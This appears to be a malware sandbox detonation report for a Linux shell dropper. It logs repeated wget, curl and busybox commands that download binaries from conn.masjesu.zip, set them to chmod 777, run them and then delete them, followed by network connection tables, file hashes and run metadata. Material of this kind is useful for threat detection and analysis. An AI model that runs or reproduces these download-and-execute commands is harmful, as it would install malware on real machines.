[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/chmod

[chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH

[./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/rm

[rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/chmod

[chmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF

[./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/rm

[rm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/chmod

[chmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG

[./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/rm

[rm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/chmod

[chmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS

[./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/rm

[rm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/chmod

[chmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj

[./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/rm

[rm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/bin/chmod

[chmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c

[./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/bin/rm

[rm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/bin/chmod

[chmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk

[./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/bin/rm

[rm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/chmod

[chmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN

[./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/rm

[rm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/chmod

[chmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v

[./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/rm

[rm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/chmod

[chmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb

[./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/rm

[rm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/chmod

[chmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I

[./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/rm

[rm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/chmod

[chmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28

[./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/rm

[rm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/chmod

[chmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc

[./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/rm

[rm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/chmod

[chmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa

[./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/rm

[rm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/chmod

[chmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28

[./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/bin/rm

[rm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/chmod

[chmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN

[./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/bin/rm

[rm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/chmod

[chmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v

[./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/bin/rm

[rm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/chmod

[chmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb

[./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/bin/rm

[rm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/chmod

[chmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I

[./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/rm

[rm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/chmod

[chmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc

[./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/rm

[rm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/chmod

[chmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa

[./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/rm

[rm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/chmod

[chmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj

[./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/rm

[rm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/chmod

[chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH

[./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/rm

[rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/chmod

[chmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF

[./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/rm

[rm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/chmod

[chmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG

[./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/rm

[rm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/chmod

[chmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS

[./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/rm

[rm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 02:44

Reported

2024-10-28 02:46

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh

[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp

Files

N/A